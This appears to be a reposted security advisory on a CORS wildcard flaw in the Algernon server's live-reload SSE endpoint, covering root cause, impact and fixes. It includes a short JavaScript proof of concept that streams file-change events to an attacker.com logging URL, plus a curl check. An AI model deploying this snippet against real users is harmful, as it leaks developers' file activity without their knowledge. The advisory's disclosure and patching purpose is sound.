Listen to this Post
The vulnerability exists in Algernon’s SSE event server where `Access-Control-Allow-Origin` is hardcoded to . In `engine/config.go`, function `recwatch.EventServer` receives literal `""` as the allowed origin. The vendored `recwatch/eventserver.go` method `GenFileChangeEvents` sets `w.Header().Set("Access-Control-Allow-Origin", allowed)` with no check of the request’s `Origin` header. Because `EventSource` API does not send a CORS preflight and does not include cookies, the wildcard is interpreted by browsers as “any origin may read the response”. An attacker crafts a webpage that creates `new EventSource(‘http://127.0.0.1:5553/sse’)` and registers `onmessage` to exfiltrate each filename. When a developer running `algernon -a` visits that page in another tab, the browser allows cross-origin read access to the live file‑change stream. The root cause is absence of origin validation – the server echoes regardless of `Origin:` request header. Exploitation requires no authentication, no cookies, and bypasses SameSite restrictions. The PoC uses a simple HTML/JS snippet that sends every received `data` field to an attacker‑controlled endpoint. This CORS misconfiguration combined with missing authentication (advisory 2a) grants full script‑level read access to the stream. The fix is independent: replace the wildcard with same‑origin echo or an explicit allow‑list.
Platform: Algernon server
Version: 1.17.6
Vulnerability : CORS wildcard misconfiguration
Severity: Medium (CVSS:5.3)
date: 2025 (unspecified)
<h2 style="color: blue;">Prediction: Patch within 30 days</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
Verify wildcard header curl -v -H "Origin: http://evil.example" http://127.0.0.1:5553/sse Expected response includes: Access-Control-Allow-Origin:
// Malicious script to exfiltrate stream
const es = new EventSource('http://127.0.0.1:5553/sse');
es.onmessage = e => fetch('https://attacker.com/log?data='+encodeURIComponent(e.data));
<h2 style="color: blue;">Exploit:</h2>
Attacker hosts HTML with above JS. Developer visits page while `algernon -a` runs. Browser opens EventSource to `localhost:5553/sse`. Server replies with `Access-Control-Allow-Origin: `. Browser allows cross‑origin JS to read all `message` events. Every file change (e.g., `probe.txt`) is sent to attacker’s server.
<h2 style="color: blue;">Protection from this CVE:</h2>
- Replace with echoing `Origin` header after validation (same‑origin check).
– Or remove CORS header entirely – mount SSE handler on main mux (same‑origin default).
– Update to patched version (once released) where `allowed` parameter uses explicit allow‑list.
– As workaround, disable `–eventserver` / `-a` flag or bind SSE to loopback with firewall rules restricting external origin access.
Impact:
Confidentiality: medium – cross‑origin tab reads live filename stream without server‑side logging. Integrity: none. Availability: none directly, but exfiltration may leak sensitive file paths and development activity.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

